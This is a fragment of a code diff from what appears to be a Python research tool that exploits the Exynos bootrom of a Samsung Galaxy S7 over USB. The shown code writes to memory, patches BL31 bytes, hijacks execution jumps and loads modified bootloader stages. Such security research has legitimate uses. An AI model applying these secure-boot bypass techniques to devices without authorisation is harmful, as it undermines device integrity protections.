self.cd.memwrite_region(0x02024774, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR # self.cd.arch_dbg.state.X0 = 0x020347f0 # self.cd.arch_dbg.state.X1 = 0 # self.cd.restore_stack_and_jump(0x02030464) self.cd.restore_stack_and_jump(lr) - time.sleep(2) - assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" - - # ====== PATCHES TO BL31 here! ====== - self.cd.memwrite_region(0x02031008, b"ELH") - # Jump into BL31 + time.sleep(2) + self.usb_read(0x200) # GiAs + self.cd.memwrite_region(0x02031008, b"ELH") + # ====== PATCHES TO BL31 here! ====== + + + # Jump BL31 self.cd.restore_stack_and_jump(0x02024010) + + time.sleep(2) self.connect_device() - assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" - # print(self.cd.memdump_region(0x020200dc, 4)) - self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) #Sets jump/X1 address at X0 0x2048000 -> Entry point of BL2 - - # Boot mode? Not sure whether its important (related to boot type at function 02023800?) - # self.cd.memwrite_region(0x02020, p32(DEBUGGER_ADDR)) # Restore original boot flow - - # Jump into USB download function - self.cd.arch_dbg.state.LR = DEBUGGER_ADDR - - # WORKS - self.cd.restore_stack_and_jump(hijacked_fun) - - # WORKING UNTIL HERE + + # self.usb_read(0x200) # GiAs + # self.cd.restore_stack_and_jump(hijacked_fun) # ==== Stage 3 BL2 ==== - BL2_FUN = 0x2048000 - bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read() - # bl2 = bl2[:(0x02052bf4-0x02048000)] + b"00000000" + bl2[(0x02052bf4-0x02048000)+8:] - self.send_normal_stage(bl2) - - # self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()) + self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()) time.sleep(2) self.connect_device() @@ -704,6 +677,7 @@ class ExynosDevice(): # ==== Stage 4 ==== stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read() # Patching + # stage4_len = len(stage4) # patch_len = len(b"USB RECOVERY MODE") # patch = b"ELHER HERE" + (b"\x00" * (patch_len - len(b"ELHER HERE")))